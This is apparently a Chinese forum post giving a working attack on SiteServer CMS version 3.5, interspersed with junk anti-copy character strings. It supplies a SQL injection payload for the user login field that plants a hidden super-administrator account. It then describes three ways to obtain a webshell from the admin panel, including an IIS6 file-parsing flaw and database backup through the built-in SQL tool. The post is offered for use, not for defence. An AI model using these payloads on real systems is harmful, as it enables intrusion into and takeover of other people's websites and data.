经测试秒杀最新的3.5版
3 [* e# F. B% m/ Z* jstieserver官网:www.siteserver.cn
1 B' M% `( m) w# ]: ~% F- o Z1 aEXP:7 J9 e+ N$ b Q. a
直接访问UserCenter/login.aspx
% N s! Y% D+ f, }$ d用户名处输入:" K& t. `' ?0 r/ n
- \+ `- v0 I9 q/ X' f& ]/ U( B123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–7 ^" L4 r) Q5 F: K' }4 ?
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
% S- f0 P J3 J: E) R3 c1 Z之后再访问后台SiteServer/login.aspx用插入的用户登陆8 V8 ~) L8 G6 h" Y, C$ r0 C
后台拿webshell的三种方法:; l; q* Q) r& k" W' w. O( l* q+ p, @
一、: U% l+ |) l! @; T4 _0 { r
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
# J5 ^+ ^/ ]3 ~' K5 x4 a. R二、. L3 i$ p( L" S) h& v. R2 P) m
成员权限-》添加用户-》用户名为:1.asp
4 x* \) o2 [' \+ ihttp://127.0.0.1/usercenter/
/ q' B5 i$ X* \8 F' U* b: F用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell4 H3 O# B. _0 Z: g
(ps:后台添加用户时不会验证是否含有非法字符)
: H- h+ p# H/ E) j' m2 x. ^三、0 I0 D" E g( ^4 J" c+ w
系统工具-》实用工具-》机器参数查看9 [/ [/ C* b2 |
可以看到数据库类型、名称,WEB路径
$ p( k4 c! `$ c$ p# w0 ]% G, s系统工具-》数据库工具-》SQL语句查询
1 J0 @0 L a- ]) i3 Q: b; ^这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |